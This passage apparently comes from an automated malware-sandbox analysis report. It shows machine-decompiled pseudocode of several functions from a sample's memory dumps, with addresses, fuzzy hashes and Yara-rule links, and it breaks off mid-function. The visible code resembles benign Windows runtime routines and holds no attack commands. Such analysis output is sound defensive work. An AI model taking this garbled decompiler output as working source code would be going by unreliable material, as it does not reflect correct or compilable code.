Instruction Fuzzy Hash: 4351EEB5105745AFD721EFA8C840B2BBBE8FF80714F14099AF495CBA51E774E904CB92

Uniqueness

Uniqueness Score: -1.00%

Function 03872AE4, Relevance: .2, Instructions: 159
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E03872AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x3938204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x3938208; // 0x3938207
				_t8 = _t57 + 0x3938208; // 0x3938207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x3938450; // 0x31511a4
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x393821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x3936d5c; // 0x7f6e0654
							_t72 =  *0x3936d5c; // 0x7f6e0654
							_t75 =  *0x3936d5c; // 0x7f6e0654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x3936d5c; // 0x7f6e0654
							_t84 =  *0x3936d5c; // 0x7f6e0654
							_t87 =  *0x3936d5c; // 0x7f6e0654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E0388F3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}

0x03872ae4
0x03872aec
0x03872aef
0x03872af4
0x03872af7
0x03872afd
0x03872b92
0x03872b92
0x03872b97
0x03872b9c
0x03872b9c
0x03872b03
0x03872b06
0x03872b09
0x03872b09
0x03872b0f
0x03872b15
0x03872b15
0x03872b1b
0x03872b1e
0x03872b21
0x03872b26
0x03872b29
0x03872b81
0x03872b84
0x03872c0e
0x03872c15
0x03872c24
0x03872c24
0x03872b8a
0x03872b8a
0x03872b8a
0x03872b8a
0x03872b90
0x00000000
0x00000000
0x00000000
0x00000000
0x03872b4a
0x03872b4a
0x03872b4d
0x03872b53
0x00000000
0x00000000
0x03872b55
0x03872b58
0x03872bb7
0x038b5d1b
0x038b5d37
0x038b5d47
0x038b5d53
0x03872bbd
0x03872bbd
0x03872bbd
0x03872bb7
0x03872b5d
0x03872c2f
0x038b5d5b
0x038b5d77
0x038b5d87
0x038b5d93
0x03872c35
0x03872c35
0x03872c35
0x03872c2f
0x03872b65
0x03872b9f
0x03872ba2
0x03872b67
0x03872b67
0x03872b69
0x03872b6b
0x03872b6e
0x03872bc9
0x03872bcc
0x03872bcf
0x03872bd4
0x03872bd6
0x03872bd6
0x03872bdb
0x03872c02
0x03872c05
0x03872c07
0x00000000
0x03872c07
0x03872be0
0x03872c00
0x03872c3f
0x03872c3f
0x00000000
0x03872c00
0x03872be5
0x03872be7
0x03872bec
0x03872bf4
0x03872bf6
0x00000000
0x03872bf6
0x03872b70
0x03872b76
0x03872b2b
0x03872b2b
0x03872b2d
0x03872b2f
0x03872b32
0x03872b35
0x03872b3a
0x00000000
0x03872b40
0x03872b43
0x03872b45
0x03872b47
0x03872b4a
0x03872b4d
0x03872b53
0x00000000
0x00000000
0x00000000
0x03872b53
0x03872b78
0x03872b78
0x03872b7b
0x03872b7e
0x00000000
0x03872b7e
0x03872b76
0x03872ba5
0x03872ba5
0x03872ba8
0x03872bad
0x00000000
0x00000000
0x03872baf
0x03872baf
0x03872bc2
0x00000000

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8809834493c550ea6d1176cbc573b0e12eef3657e1b3a0c52cae86e52d4ec135
Instruction ID: 296b4e6005cf0267cc44dabb73e03d3eac8b43344ece9032dffbba10293afc49
Opcode Fuzzy Hash: 8809834493c550ea6d1176cbc573b0e12eef3657e1b3a0c52cae86e52d4ec135
Instruction Fuzzy Hash: D551C1B6A00129CFCB14DF9CC8849BDB7F2FB98700715899AE856EB314D730EA55CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1042DA5E, Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp, Offset: 10410000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10e3c50aa77be605547b3e1288f037f5812604161c316b41ec8d241861faa457
Instruction ID: 20cdffb41fc3da1e23fd000f297fc8c90089a0b54e3d00f922d215461c6c905e
Opcode Fuzzy Hash: 10e3c50aa77be605547b3e1288f037f5812604161c316b41ec8d241861faa457
Instruction Fuzzy Hash: E581B072A493D1CFE706DF68E8DA7413FB2E786220B48439DCEA15B1D2C7742166CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0385EF40, Relevance: .1, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E0385EF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E03849080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x770bc21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E03842D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}

0x0385ef4b
0x0385ef4d
0x0385ef57
0x0385f0bd
0x0385f0c2
0x0385f0d2
0x0385f0d2
0x0385f0c2
0x0385ef5d
0x0385ef5f
0x0385ef67
0x0385ef6a
0x0385ef6d
0x0385ef74
0x0385ef7f
0x0385ef82
0x0385ef82
0x0385ef86
0x0385ef88
0x0385ef8c
0x0385ef8f
0x0385ef8f
0x0385ef8f
0x00000000
0x0385ef91
0x0385ef93
0x0385efc4
0x0385efc4
0x0385efc4
0x0385efca
0x0385efd0
0x0385f0a6
0x00000000
0x00000000
0x0385f0af
0x038abb06
0x038abb0a
0x0385f0b5
0x0385f0b5
0x0385f0b5
0x0385f0b5
0x00000000
0x0385efd6
0x0385efd9
0x0385f0de
0x0385f0e2
0x0385efdf
0x0385efdf
0x0385efdf
0x0385efe5
0x038abafc
0x038abafc
0x0385efe5
0x0385efeb
0x0385efed
0x0385f00f
0x0385f011
0x0385f01a
0x0385f01d
0x0385f021
0x0385f028
0x0385f029
0x0385f029
0x0385f02c
0x00000000
0x0385f02c
0x0385eff3
0x0385eff9
0x0385f0ea
0x0385f0ed
0x0385f0ef
0x00000000
0x0385f0ef
0x0385f003
0x038abb12
0x0385f045
0x0385f049
0x0385f051
0x0385f09e
0x0385f0a0
0x0385f0a0
0x0385f09e
0x0385f053
0x0385f064
0x0385f064
0x0385f06b
0x038abb1a
0x038abb1a
0x0385f071
0x0385f071
0x0385f07d
0x0385f082
0x0385f08f
0x0385f08f
0x0385f009
0x0385f00d
0x00000000
0x0385f00d
0x0385efd0
0x0385ef97
0x0385efa5
0x0385efaa
0x00000000
0x0385efac
0x0385efac
0x0385efac
0x00000000
0x0385efb2
0x0385f036
0x0385f03a
0x0385f040
0x0385f090
0x00000000
0x0385f092
0x0385f042
0x00000000
0x0385f042
0x0385efb7
0x0385efb9
0x0385efbc
0x0385efb0
0x0385efb0
0x00000000
0x0385efbe
0x0385efbe
0x0385efc1
0x00000000
0x0385efc1
0x0385efbc
0x0385efaa
0x0385ef91

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction ID: c57a3dec6d4b8420be4304c0b87f6cf0f16b6e04332d3783f24241e5fdb6303e
Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction Fuzzy Hash: CA51DF31A04249EFDB24CBE8C5907EEFBB2AF05318F1C81E9E945D7281C775AA89C751

Uniqueness

Uniqueness Score: -1.00%

Function 0391740D, Relevance: .1, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E0391740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E0389D4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E0388F380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L03864620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L03864620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E0388F3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L03864620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}

0x0391740d
0x0391740d
0x03917412
0x03917413
0x03917416
0x03917418
0x0391741c
0x0391741f
0x03917422
0x03917422
0x03917428
0x0391742a
0x0391742a
0x03917451
0x03917432
0x0391744f
0x0391744f
0x00000000
0x03917434
0x03917438
0x03917443
0x03917517
0x03917517
0x0391751a
0x03917535
0x03917520
0x03917527
0x0391752c
0x03917531
0x03917533
0x00000000
0x03917533
0x00000000
0x03917531
0x0391754b
0x0391754f
0x0391755c
0x0391755c
0x0391755f
0x03917560
0x03917561
0x03917562
0x03917563
0x03917568
0x0391756a
0x0391756c
0x0391756d
0x0391756d
0x0391756f
0x03917572
0x03917574
0x03917577
0x0391757c
0x0391757f
0x00000000
0x03917551
0x03917551
0x03917551
0x03917553
0x03917553
0x03917449
0x03917449
0x0391744c
0x0391744c
0x00000000
0x0391744c
0x03917443
0x0391750e
0x03917514
0x03917514
0x03917455
0x03917469
0x0391746d
0x00000000
0x03917473
0x03917473
0x03917476
0x03917480
0x03917484
0x0391748e
0x03917493
0x03917493
0x03917496
0x03917499
0x039174a1
0x039174b1
0x039174b5
0x00000000
0x039174bb
0x039174c1
0x039174c1
0x039174c4
0x039174c5
0x039174c6
0x039174c7
0x039174c8
0x039174cd
0x00000000
0x039174d3
0x039174d3
0x039174d6
0x039174d8
0x039174db
0x039174dd
0x039174e0
0x039174e7
0x039174ee
0x039174ee
0x039174f4
0x039174f9
0x00000000
0x039174fb
0x039174fb
0x039174fd
0x03917500
0x03917503
0x03917505
0x03917505
0x039174f9
0x00000000
0x039174cd
0x039174b5
0x00000000

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction ID: 79f90971b1307798a05797605466e297ef5f920d95d05977ace5bdd018fcb09d
Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction Fuzzy Hash: F551907160060AEFDB15CF94C480A56FBB9FF45304F18C0AAE908EF255E371E955CB90

Uniqueness

Uniqueness Score: -1.00%

Function 03872990, Relevance: .1, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E03872990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x391ff00);
				E0389D08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x3821664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E0388E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x3821668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E038C51BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x382166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E03872AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E03856600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E03872C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E0385EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E03872AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E03872C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E03872ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E0389D0D1(_t62);
				goto L28;
			}

0x03872990
0x03872992
0x03872997
0x038729a3
0x038729a6
0x038729ab
0x038729ad
0x038729b2
0x038b5c80
0x038729b8
0x038729b8
0x038729bb
0x038729c0
0x038729c5
0x038729c6
0x038729c6
0x038729cb
0x00000000
0x00000000
0x038729cd
0x038729d0
0x038729d9
0x038729db
0x038729dd
0x03872a7f
0x03872a84
0x03872a87
0x03872a89
0x038b5ca1
0x038b5ca3
0x00000000
0x03872a8f
0x03872a8f
0x00000000
0x03872a8f
0x00000000
0x038729e3
0x038729e3
0x038729e3
0x00000000
0x038729e3
0x038729dd
0x00000000
0x038729db
0x038729e6
0x038729e9
0x038729eb
0x038729ed
0x038729f3
0x038729f5
0x038729f8
0x038729fa
0x03872a97
0x03872a9a
0x03872a9d
0x03872add
0x00000000
0x03872a9f
0x03872aa2
0x03872aa5
0x03872aa8
0x03872aab
0x038b5cab
0x038b5caf
0x038b5cc5
0x038b5cda
0x038b5cdc
0x038b5cdf
0x038b5ce5
0x00000000
0x038b5ceb
0x038b5ced
0x038b5cee
0x00000000
0x038b5cee
0x038b5cb1
0x038b5cb4
0x038b5cb9
0x038b5cbb
0x00000000
0x038b5cbd
0x038b5cbd
0x00000000
0x038b5cbd
0x038b5cbb
0x03872ab1
0x03872ab1
0x03872ac4
0x03872ac6
0x03872ac6
0x00000000
0x03872ac6
0x03872aab
0x00000000
0x03872a00
0x03872a09
0x03872a0e
0x03872a21
0x03872a24
0x03872a35
0x03872a3a
0x03872a3d
0x03872a42
0x03872a59
0x03872a59
0x03872a5c
0x03872a5f
0x03872a5f
0x038729fa
0x038729f3
0x03872a64
0x03872a64
0x03872a6b
0x03872a6b
0x03872a6d
0x03872a72
0x00000000

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b95a10fa03684da48e03958cbe962b1b1f6def9edb5cd8cfcb0c17766f94591d
Instruction ID: 8eeb3b0f965d5ad9ba37c6d0395e332b5f2ae4aefdbaf1fa641ace1ed411ab03
Opcode Fuzzy Hash: b95a10fa03684da48e03958cbe962b1b1f6def9edb5cd8cfcb0c17766f94591d
Instruction Fuzzy Hash: CB515A71A00209DFDF25DF99C880ADEBBB6BF48314F288595E815EB260D335D952CF90

Uniqueness

Uniqueness Score: -1.00%

Function 03874BAD, Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E03874BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
